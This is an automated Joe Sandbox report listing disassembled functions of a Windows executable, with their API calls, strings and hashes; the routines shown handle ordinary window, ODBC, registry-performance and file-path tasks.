Download Yara Rule

APIs

SendMessageA.USER32(00000000,00000405,00000000,?), ref: 00431049
GetWindowLongA.USER32(?,000000FC), ref: 0043105A
GetWindowLongA.USER32(?,000000FC), ref: 0043106A
SetWindowLongA.USER32(?,000000FC,?), ref: 00431086

Strings

(, xrefs: 00431034

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: LongWindow$MessageSend
String ID: (
API String ID: 2178440468-3887548279
Opcode ID: 342d5b64406d688037c14e89acf336427ac38410e26f00c1d46d8a6e0eaa005a
Instruction ID: ae61c1b2802c19b7217b4c706031da1a6e3a644b8e456e654556614fb11e05a6
Opcode Fuzzy Hash: 342d5b64406d688037c14e89acf336427ac38410e26f00c1d46d8a6e0eaa005a
Instruction Fuzzy Hash: 383190306007059FDB20AF65C8A4B6EBBB5BF48714F10522EE541A76A2DB78E845CB98

Function 004010B0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 100COMMON

Download Yara Rule

APIs

Part of subcall function 00419E49: GetFileAttributesA.KERNEL32(?,004010E0), ref: 00419E4D
Part of subcall function 00419E49: GetLastError.KERNEL32 ref: 00419E58

#24.ODBC32(00000002,?,?,00000000), ref: 00401165
#41.ODBC32(?,?,?,?,00000000,00000000,00000000,00000001,00000002,?,?,00000000), ref: 00401189

Strings

Dialup, xrefs: 004010F9
Microsoft Access Driver (*.mdb), xrefs: 00401136
DSN=%s$ DESCRIPTION=TOC support source$ DBQ=%s$ FIL=MicrosoftAccess$ DEFAULTDIR=D:\Database$$ , xrefs: 004010FE

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: AttributesErrorFileLast
String ID: DSN=%s$ DESCRIPTION=TOC support source$ DBQ=%s$ FIL=MicrosoftAccess$ DEFAULTDIR=D:\Database$$ $Dialup$Microsoft Access Driver (*.mdb)
API String ID: 1799206407-3026524642
Opcode ID: fe8aba5953093ba791051b45545c33863af4c8367e9c3a84c7840269c157bcfe
Instruction ID: ac105d7b03c89bc9a3c9900ef4fe83b19d5e7a21bce56d3809211aed22dbc9b3
Opcode Fuzzy Hash: fe8aba5953093ba791051b45545c33863af4c8367e9c3a84c7840269c157bcfe
Instruction Fuzzy Hash: 573179752043406ED324EF15DC02FABB3A4EF85B28F40062FFD64A72D1D7B95909C26A

Function 00447E9F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93COMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00447ED9

Part of subcall function 004338C4: SetWindowPos.USER32(?,?,?,?,00000013,00000000,00000000,?,0043C420,0046D0F8,00000000,00000000,00000000,00000000,00000013), ref: 004338EB

GetWindowLongA.USER32(?,000000F0), ref: 00447F76
UpdateWindow.USER32(?), ref: 00447F8F

Strings

P, xrefs: 00447F14
$D, xrefs: 00447EA6, 00447F5D

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Window$LongParentUpdate
String ID: P$$D
API String ID: 1906497633-2161014343
Opcode ID: 90a266fd7e54b857c9589671b773bf7a1b51af26f47478a3a6bcf20fdbc03b87
Instruction ID: 389380e8e5e4f4c73397b948d0faca074b199550a13b5fdd3118ff0a3cdc9903
Opcode Fuzzy Hash: 90a266fd7e54b857c9589671b773bf7a1b51af26f47478a3a6bcf20fdbc03b87
Instruction Fuzzy Hash: 6931CF71600605AFEB229F20CC49B6FBBE4EF04715F00412AFA065B2E2D7399D56CB58

Function 0044BFB4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 88stringCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?), ref: 0044BFE5

Part of subcall function 0044C0D1: lstrlenA.KERNEL32(00000104,00000000,?,0044C015), ref: 0044C108

lstrcpyA.KERNEL32(?,.HLP,?,?,00000104), ref: 0044C086
lstrcatA.KERNEL32(?,.INI,?,?,00000104), ref: 0044C0B3

Strings

.HLP, xrefs: 0044C080
.INI, xrefs: 0044C0AD

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: FileModuleNamelstrcatlstrcpylstrlen
String ID: .HLP$.INI
API String ID: 2421895198-3011182340
Opcode ID: 2e1d99f47c4420afa9e5eae6e84d2b9235f9426cf403ec7ea1e7490b2a9a024b
Instruction ID: cd9e602957264c438358f2b310d88ee16b21d10fe0eca384e6e550fc80837b5d
Opcode Fuzzy Hash: 2e1d99f47c4420afa9e5eae6e84d2b9235f9426cf403ec7ea1e7490b2a9a024b
Instruction Fuzzy Hash: F5316175900718DFEB20DBB1DC85BD6B7FCAB08314F10486BE599D2151DB78A9C48B68

Function 00446FC9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,00000362,0000E002,00000000), ref: 0044702F
UpdateWindow.USER32(?), ref: 00447046
GetParent.USER32(?), ref: 004470B1
PostMessageA.USER32(?,0000036A,00000000,00000000), ref: 004470CD

Strings

@, xrefs: 0044709C

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Message$ParentPostSendUpdateWindow
String ID: @
API String ID: 4141989945-2766056989
Opcode ID: 71ca687fdb9acce19fda94e4716f5d2967af4b45d174f045d77d178c2f5a17c0
Instruction ID: cc67df920ec848dea2ef8e4687383078cadd03346118fe4c30df91a27cc75bad
Opcode Fuzzy Hash: 71ca687fdb9acce19fda94e4716f5d2967af4b45d174f045d77d178c2f5a17c0
Instruction Fuzzy Hash: 6A31A071605B04EFFB304F35DC08B6BB7A6BF44351F11492EE51A9A2A2D779E842DB08

Function 0041B3CE Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 0041B3DB
GetSystemTime.KERNEL32(?), ref: 0041B3E5
GetTimeZoneInformation.KERNEL32(?), ref: 0041B43A

Strings

84A, xrefs: 0041B483, 0041B487
84A, xrefs: 0041B49C

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Time$InformationLocalSystemZone
String ID: 84A$84A
API String ID: 2475273158-1128337081
Opcode ID: 77d2fd7ad059b50d71231dda2f94aa571a37e48ad5038debe7fe968d011aeda7
Instruction ID: 4fb8a2e524984f76aa9e23d507a581c44ebbf872cee8e21b0221e81c3583dae4
Opcode Fuzzy Hash: 77d2fd7ad059b50d71231dda2f94aa571a37e48ad5038debe7fe968d011aeda7
Instruction Fuzzy Hash: C3215179D0011995CF20AF98D8446FF77B8EF04710F808512FC15A62A1E3788CC2C7AD

Function 004314A8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 68COMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 004314DE
wsprintfA.USER32 ref: 004314FA
GetClassInfoA.USER32(?,-00000058,?), ref: 00431509

Strings

Afx:%x:%x:%x:%x:%x, xrefs: 004314F4
Afx:%x:%x, xrefs: 004314D8

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: wsprintf$ClassInfo
String ID: Afx:%x:%x$Afx:%x:%x:%x:%x:%x
API String ID: 845911565-79760390
Opcode ID: 45b99d5a2618106ea76e4874ae3d5f96ea58d1310cf31a91bed1990cad137715
Instruction ID: cce00e01029f0850c3aa6f7d9a533c9895ed4a1e1a03ff9caed2aad4d58b4f80
Opcode Fuzzy Hash: 45b99d5a2618106ea76e4874ae3d5f96ea58d1310cf31a91bed1990cad137715
Instruction Fuzzy Hash: 85213B7190020AAF8F10DF99D8809EF7BB8EF59355F10502FF909E2211E7389A51CBA9

Function 0040F700 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryA.ADVAPI32(00000000,80000006,?), ref: 0040F727

Part of subcall function 0042F65E: lstrlenA.KERNEL32(?,00000100,00433FDB,000000FF,?,00000000,000000FF,00000100,?,?,?,00000100,?,?), ref: 0042F671

RegOpenKeyExA.ADVAPI32(?,PerfStats\StatData,00000000,00020019,?,000000FF,?,?,00000000,?,?), ref: 0040F751
RegQueryValueExA.ADVAPI32 ref: 0040F77C
RegCloseKey.ADVAPI32(?), ref: 0040F78E

Strings

PerfStats\StatData, xrefs: 0040F74B

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: CloseConnectOpenQueryRegistryValuelstrlen
String ID: PerfStats\StatData
API String ID: 3320484019-968766411
Opcode ID: a6785a21005bcc1785e0945bf2c6156d7c12bdeb8d2f4ed915816f47ead7ede7
Instruction ID: c623a059e97d4d49f687a737aadb0fcc5c587e13983f549bdf8c8de367d49072
Opcode Fuzzy Hash: a6785a21005bcc1785e0945bf2c6156d7c12bdeb8d2f4ed915816f47ead7ede7
Instruction Fuzzy Hash: 42118EB63043166BC610DE55EC84D6BB7ACEBD4B69F000A3EFA4493250DA74EC0987E6

Function 0042F8A2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56windowCOMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(?,000000F0), ref: 0042F8E3
GetDlgItem.USER32(?,00000002), ref: 0042F902
IsWindowEnabled.USER32(00000000), ref: 0042F90D
SendMessageA.USER32(?,00000111,00000002,00000000), ref: 0042F923

Strings

Edit, xrefs: 0042F8ED

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Window$EnabledItemLongMessageSend
String ID: Edit
API String ID: 3499652902-554135844
Opcode ID: 4078306d12fb3b670d586de6dacdef8100e589ad5a816707e8f551d930aa6867
Instruction ID: c36164791ef253133dee7eca5fbfe4c049434445d358cb8fb985cce8e218e32e
Opcode Fuzzy Hash: 4078306d12fb3b670d586de6dacdef8100e589ad5a816707e8f551d930aa6867
Instruction Fuzzy Hash: 35010070300621BAEB342A22BC59B6BA779AF04751FD4443BF501E22E5EF68DC89C61C

Function 00449310 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 39COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00449315

Part of subcall function 00435A8E: __EH_prolog.LIBCMT ref: 00435A93

Strings

PreviewPages, xrefs: 00449366
Recent File List, xrefs: 00449343
File%d, xrefs: 0044933E
Settings, xrefs: 0044936B

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: H_prolog
String ID: File%d$PreviewPages$Recent File List$Settings
API String ID: 3519838083-526586445
Opcode ID: cf433b769f1388d11b34b88c5358f99b1f74df9d1518c6c1439999e32078bffd
Instruction ID: 310ab3db57c92eeeb5ca32bb3084895504402a28d0c10445de9ac820dd691276
Opcode Fuzzy Hash: cf433b769f1388d11b34b88c5358f99b1f74df9d1518c6c1439999e32078bffd
Instruction Fuzzy Hash: FE01D631740715EBFB54AFA0C806B9E76A0AB09716F20422FB915A62C1CBBC4D049649

Function 004389E8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 25libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(GDI32.DLL,?,?,00441758,00000000), ref: 004389F1
GetProcAddress.KERNEL32(00000000,SetLayout), ref: 004389FF
SetLastError.KERNEL32(00000078,?,?,00441758,00000000), ref: 00438A21

Strings

SetLayout, xrefs: 004389F7
GDI32.DLL, xrefs: 004389EC

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: AddressErrorHandleLastModuleProc
String ID: GDI32.DLL$SetLayout
API String ID: 4275029093-2147214759
Opcode ID: c86aae9d0d6dce07592a0ddaaef3c37521156c204c07185383ebdc6da261ae5a
Instruction ID: c92af5b2d0ac30944c1efb1b8eb233a2a440aaadde6388c3e160e89f05454d4c
Opcode Fuzzy Hash: c86aae9d0d6dce07592a0ddaaef3c37521156c204c07185383ebdc6da261ae5a
Instruction Fuzzy Hash: 85E0D833604700EBC2206B599C0882AF7A29BC8773F15853BF939D11A1CEB88C058729

Function 004389B2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(GDI32.DLL,?,0044174B), ref: 004389BA
GetProcAddress.KERNEL32(00000000,GetLayout), ref: 004389C6
SetLastError.KERNEL32(00000078), ref: 004389DE

Strings

GDI32.DLL, xrefs: 004389B5
GetLayout, xrefs: 004389C0

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: AddressErrorHandleLastModuleProc
String ID: GDI32.DLL$GetLayout
API String ID: 4275029093-2396518106
Opcode ID: 51ad34586c2b03d231ed882af79ebcb1f715c341166e750567521411a75c5aef
Instruction ID: 00e1488347c465172fa54c098c9268af170ae8b0274c11fcb70275a6526b414a
Opcode Fuzzy Hash: 51ad34586c2b03d231ed882af79ebcb1f715c341166e750567521411a75c5aef
Instruction Fuzzy Hash: E2D02B32600710EBC65027A46C0DB36BA944F08BB3704023BBC2AD21E1CEE8CC044399

Function 00441720 Relevance: 7.8, APIs: 5, Instructions: 339COMMON

Download Yara Rule

APIs

Part of subcall function 00441FFF: PeekMessageA.USER32(?,00000000,0000000F,0000000F,00000000), ref: 0044201C
Part of subcall function 00441FFF: GetMessageA.USER32(0000000F,00000000,0000000F,0000000F), ref: 0044202A
Part of subcall function 00441FFF: DispatchMessageA.USER32(?), ref: 0044203D
Part of subcall function 00441FFF: SetRectEmpty.USER32(?), ref: 00442066
Part of subcall function 00441FFF: GetDesktopWindow.USER32 ref: 0044207E
Part of subcall function 00441FFF: LockWindowUpdate.USER32(?,00000000,?,00000000,0000000F,0000000F,00000000), ref: 0044208F
Part of subcall function 00441FFF: GetDCEx.USER32(?,00000000,00000003,?,00000000,0000000F,0000000F,00000000), ref: 004420A6

Part of subcall function 004389B2: GetModuleHandleA.KERNEL32(GDI32.DLL,?,0044174B), ref: 004389BA
Part of subcall function 004389B2: GetProcAddress.KERNEL32(00000000,GetLayout), ref: 004389C6

GetWindowRect.USER32(?,?), ref: 0044176E

Part of subcall function 004389E8: GetModuleHandleA.KERNEL32(GDI32.DLL,?,?,00441758,00000000), ref: 004389F1
Part of subcall function 004389E8: GetProcAddress.KERNEL32(00000000,SetLayout), ref: 004389FF

GetWindowRect.USER32(?,?), ref: 0044185B

Part of subcall function 0044165F: OffsetRect.USER32(?,?,?), ref: 00441696

Part of subcall function 00441A73: OffsetRect.USER32(?,?,?), ref: 00441A9C
Part of subcall function 00441A73: OffsetRect.USER32(?,?,?), ref: 00441AA6
Part of subcall function 00441A73: OffsetRect.USER32(?,?,?), ref: 00441AB0
Part of subcall function 00441A73: OffsetRect.USER32(?,?,?), ref: 00441ABA

Part of subcall function 004423D0: GetCapture.USER32 ref: 004423E1
Part of subcall function 004423D0: SetCapture.USER32(?), ref: 004423F1
Part of subcall function 004423D0: GetCapture.USER32 ref: 004423FD
Part of subcall function 004423D0: GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00442417
Part of subcall function 004423D0: DispatchMessageA.USER32(?), ref: 00442449
Part of subcall function 004423D0: GetCapture.USER32 ref: 004424A7

GetWindowRect.USER32(?,?), ref: 00441908
InflateRect.USER32(?,00000002,00000002), ref: 00441A0B
InflateRect.USER32(?,00000002,00000002), ref: 00441A1E

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Rect$MessageOffsetWindow$Capture$AddressDispatchHandleInflateModuleProc$DesktopEmptyLockPeekUpdate
String ID:
API String ID: 2041477333-0
Opcode ID: b7328277af8b1990d67afb55fe59f1473e68ab2871a5510a08b55e0638ff5bd1
Instruction ID: 7cb6693840f6304ee88fff58f3a509356fc8895e58944cf4698e66dde1fa27d8
Opcode Fuzzy Hash: b7328277af8b1990d67afb55fe59f1473e68ab2871a5510a08b55e0638ff5bd1
Instruction Fuzzy Hash: B7D136719006189FCF04CF98C880ADEBBB6AF49310F1581AAED09BB355D7B5AA45CF94

Function 0043F472 Relevance: 7.8, APIs: 5, Instructions: 258COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 0043F484
InflateRect.USER32(?,?,?), ref: 0043F49A
BeginDeferWindowPos.USER32(?), ref: 0043F4E5
InvalidateRect.USER32(?,00000000,00000001,0000EA20), ref: 0043F55E
EndDeferWindowPos.USER32(?), ref: 0043F70E

Part of subcall function 004336C7: GetDlgItem.USER32(?,?), ref: 004336D5

Part of subcall function 0043F3DC: GetClientRect.USER32(?,?), ref: 0043F3FD
Part of subcall function 0043F3DC: GetParent.USER32(?), ref: 0043F415
Part of subcall function 0043F3DC: GetClientRect.USER32(?,?), ref: 0043F43F

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Rect$Client$DeferWindow$BeginInflateInvalidateItemParent
String ID:
API String ID: 939197390-0
Opcode ID: 3dee744f62d55e0bdfbeb2ac8e3553e56ece6f77004c14e030f1cfcb1ba5ddd6
Instruction ID: b307b3ef4f59cda0386618109ca89e12b6ec045554a1ff202138ed6042e1383f
Opcode Fuzzy Hash: 3dee744f62d55e0bdfbeb2ac8e3553e56ece6f77004c14e030f1cfcb1ba5ddd6
Instruction Fuzzy Hash: D8A11971E00609EFCF15CFA9C8859AEBBF6FF88304F10442EE152A7661DB34A945CB54

Function 00409B70 Relevance: 7.8, APIs: 5, Instructions: 256COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(?,?,00000004), ref: 00409BA1
LoadResource.KERNEL32(?,00000000), ref: 00409BC5

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Resource$FindLoad
String ID:
API String ID: 2619053042-0
Opcode ID: f88c6a7cd983d5cedd17c11c2a38804821cddbe30a03209a336a1835cc81d2a6
Instruction ID: 64c9e2e39fd944bb5f607fa18783a3e1ca9ec16b9604ccda09beea26bb611de0
Opcode Fuzzy Hash: f88c6a7cd983d5cedd17c11c2a38804821cddbe30a03209a336a1835cc81d2a6
Instruction Fuzzy Hash: C2A1ABB16083509FD314DF19C880A6BB7E4BF88718F404A2EF99697392D778ED04CB96

Function 0044D248 Relevance: 7.7, APIs: 5, Instructions: 208stringCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0044D24D
lstrlenA.KERNEL32(?,?,00000000), ref: 0044D278

